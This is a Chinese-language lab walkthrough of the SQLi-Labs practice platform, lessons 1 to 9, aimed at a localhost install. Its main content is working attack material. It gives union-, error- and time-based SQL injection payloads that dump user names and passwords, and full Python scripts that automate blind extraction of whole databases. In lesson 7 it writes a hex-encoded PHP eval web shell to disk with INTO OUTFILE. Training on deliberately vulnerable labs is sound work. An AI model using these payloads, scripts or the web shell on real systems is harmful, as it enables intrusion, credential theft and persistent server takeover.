SqliLab 题解

SqliLab 每日一注

介绍

SQLI-LABS 是一个 SQL 注入练习平台, 包含了基础的 sql 注入案例，挺好玩的
项目地址在这

安装

将源代码复制到 Apache webroot 文件夹(htddocs，/var/www)
打开 sql-connections 文件夹下的"db-creds.inc"文件
修改 mysql 用户名和密码为你自己的
打开浏览器，通过 localhost 的 index.html 访问文件夹
点击 setup/resetDB 就会在你的 mysql 中创造数据库
开始日站咯

Day1-Less1

分析

select *,* from XX where id = '$id' LIMIT 0,1
select *,* from XX where id = '' or 1=1 limit 1,2--+' LIMIT 0,1
http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 3,4 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+

http://localhost/sqllab/Less-1/?id=' or 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+


数据库版本: @@version
查看 MySQL 的当前用户 USER()
INFORMATION_SCHEMA.COLUMNS
INFORMATION_SCHEMA.TABLES


select *,* from XX where id = '

' LIMIT 0,1

http://localhost/sqllab/Less-1/?id=' or 1=(SELECT length(TABLE_NAME FROM) INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='security' limit 0,1) --+

记录一下技巧
select group_concat(username) from users;
(sleep(ascii(mid(user()from(2)for(1)))=109))

比如在 mysql 中我们可以使用如下的经典语句进行报错。
select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

这是网上流传很广的一个版本，可以简化成如下的形式。
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

如果关键的表被禁用了，可以使用这种形式
select count(*) from (select 1 union select null union select !1)x group by concat(version(),floor(rand(0)*2));

如果 rand 被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
其实这是 mysql 的一个 bug 所引起的，其他数据库都不会因为这个问题而报错。

代码

from requests import get

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=0' or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-1/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day2-Less2

分析

select *,* from XX where id = $id LIMIT 0,1

select *,* from XX where id = 0 union all SELECT 0,username,password FROM security.users limit 1,2 --+ LIMIT 0,1
http://localhost/sqllab/Less-1/?id= 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+

代码

from requests import get

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=0 or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-2/?id=0 or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-2/?id=-1 or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day3-Less3

分析

select *,* from XX where id = '($id)' LIMIT 0,1
select *,* from XX where id = ('$id') LIMIT 0,1

select *,* from XX where id = '(1)' LIMIT 0,1
select *,* from XX where id = '()' --+)' LIMIT 0,1
select *,* from XX where id = ('1') --+') LIMIT 0,1

select *,* from XX where id = ('
1') or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
') LIMIT 0,1

代码

from requests import get

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=0') or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-3/?id=0') or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-3/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data

DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day4-Less4

分析

select *,* from XX where id = "($id)" LIMIT 0,1
select *,* from XX where id = ("$id") LIMIT 0,1

select *,* from XX where id = ("") LIMIT 0,1

select *,* from XX where id = ("
1") or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' limit 1,2 --+
') LIMIT 0,1

Day5-Less5

分析

select *,* from XX where id = '$id' LIMIT 0,1

select *,* from XX where id = '1' order by 3--+' LIMIT 0,1
3 列

' or 0 union all SELECT 0,1,2 FROM k--+
库名 security

concat(user(),floor(rand(0)*2))

select *,* from XX where id='
' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_NAME limit 102,1))) --+
' LIMIT 0,1

http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat(user(),'*',@@version,'*',(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA limit 1,1)))

 where extractvalue(1,concat('*',(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA='security' limit 2,1),'*'));

 http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where extractvalue(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))) --+
 遍历 0 即可
(extractvalue 有长度限制,最长 32 位)

或者
http://localhost/sqllab/Less-5/?id=' union select 1,2,3 from INFORMATION_SCHEMA.tables where updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1) --+
(updatexml 有长度限制,最长 32 位)

或者
http://localhost/sqllab/Less-5/?id=' union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

或者
http://localhost/sqllab/Less-5/?id=' or 1 group by concat_ws('*',(select username from security.users limit 0,1),(select password from security.users limit 0,1),floor(rand(0)*2)) having min(0) --+

或者
http://localhost/sqllab/Less-5/?id=' union select (concat_ws('*', (select username from security.users limit 0,1),(select password from security.users limit 0,1), floor(rand(0)*2))), count(*), 3 from security.users group by 1 --+

Day6-Less6

分析

select *,* from XX where id = "$id" LIMIT 0,1

同 5
http://localhost/sqllab/Less-6/?id=" union select count(*),2,3 from INFORMATION_SCHEMA.tables group by concat('*',floor(rand(0)*2),'*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1))--+

Day7-Less7

分析

select *,* from XX where id = (('$id')) LIMIT 0,1

http://localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt" --+

select id,username,password from users where id = (('
')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "C:\\Users\\Troy\\Desktop\\1.txt"; --+
')) LIMIT 0,1

localhost/sqllab/Less-7/?id=')) or 0 union all SELECT 0,TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA ='security' INTO OUTFILE "1.txt"; --+

')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "/weshell.php" --+
')) or 0 union all SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2,3 into outfile "D:\\wamp\\www\\weshell.php" --+

由于没有返回值，php 没法取到，在源码的逻辑下会报错

Day8-Less8

分析

同 5

代码

from requests import get

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=0' or length(database())=%d--+" %i)
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            r = get("http://localhost/sqllab/Less-1/?id=0' or ascii(SUBSTR(database(),%d,1))='%d'--+" %(i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s') --+" %(i,name))
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d' --+" %(DBName,no,i+1,n))
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

def GuessCLMNum(tname,dname):
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, TNames):
    for tname in TNames:
        print '[+]Guessing Colunms for', tname
        CLMNames = []
        for cnum in range(GuessCLMNum(tname,DBName)):
            length = GuessCLMLen(cnum, tname, DBName)
            name = ''
            for i in xrange(length):
                for n in xrange(127):
                    r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1))='%d' --+" %(tname,DBName,cnum,i+1,n))
                    html = r.text
                    if 'Your Login name' in html:
                        name += chr(n)
                        print '    [-]', name
                        break

            data = GuessDatas(DBName, tname, name)
            CLMNames.append(name)
        print '  [-]The Colunms are',CLMNames


def GuessDatasnum(dname, tname, cname):
    i = 0
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    print '    [-]Guessing data length'
    i = 1
    while 1:
        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in xrange(127):
                while 1:
                    try:
                        r = get("http://localhost/sqllab/Less-1/?id=' or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1))='%d' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += chr(n)
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data


DBLength = GuessDBLength()
DBName = GuessDBName(DBLength)
print
TBsNum = GuessTBsNum(DBName)
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'

Day9-Less9

分析

' or 1 union select 1,2,sleep(2) --+

0' or length(database())=8 --+
1' and length(database())=8 and sleep(2)--+

代码

from requests import get
from time import *

def GuessDBLength():
    print '[+]Guessing DBLength'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and length(database())=%d  and sleep(2)--+" %i)
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The DatabaseNameLength is', i
            return i
        i+=1

def GuessDBName(length):
    print '[+]Guessing DBName'
    name = ''
    for i in xrange(length):
        for n in xrange(127):
            s = clock()
            r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR(database(),%d,1))='%d' and sleep(2)--+" %(i+1,n))
            html = r.text
            if clock()-s > 1.5:
                name += chr(n)
                print '  [-]', name
                break
    print '  [-]DBName is:', name
    return name

def GuessTBsNum(name):
    print '[+]Guessing Tables num'
    i = 0
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and %d=(SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s')  and sleep(2)--+" %(i,name))
        html = r.text
        if clock()-s > 1.5:
            print '  [-]The Tables num is', i
            break
        i+=1
    return i

def GuessTBNameLenth(n, name):
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        s = clock()
        r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1))  and sleep(2)--+" %(name,n,i))        
        html = r.text
        if clock()-s < 1.5:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    TBsNames = []
    for no in range(num):
        name = ''
        length = GuessTBNameLenth(no, DBName)
        print '  [-]Guessing Table Name'
        for i in xrange(length):
            for n in xrange(127):
                s = clock()
                r = get("http://localhost/sqllab/Less-9/?id=1' and ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1))='%d'  and sleep(2)--+" %(DBName,no,i+1,n))
                html = r.text
                if clock()-s > 1.5:
                    name += chr(n)
                    print '    [-]', name
                    break
        TBsNames.append(name)
    print '  [-]All Tables Names is:', TBsNames
    return TBsNames

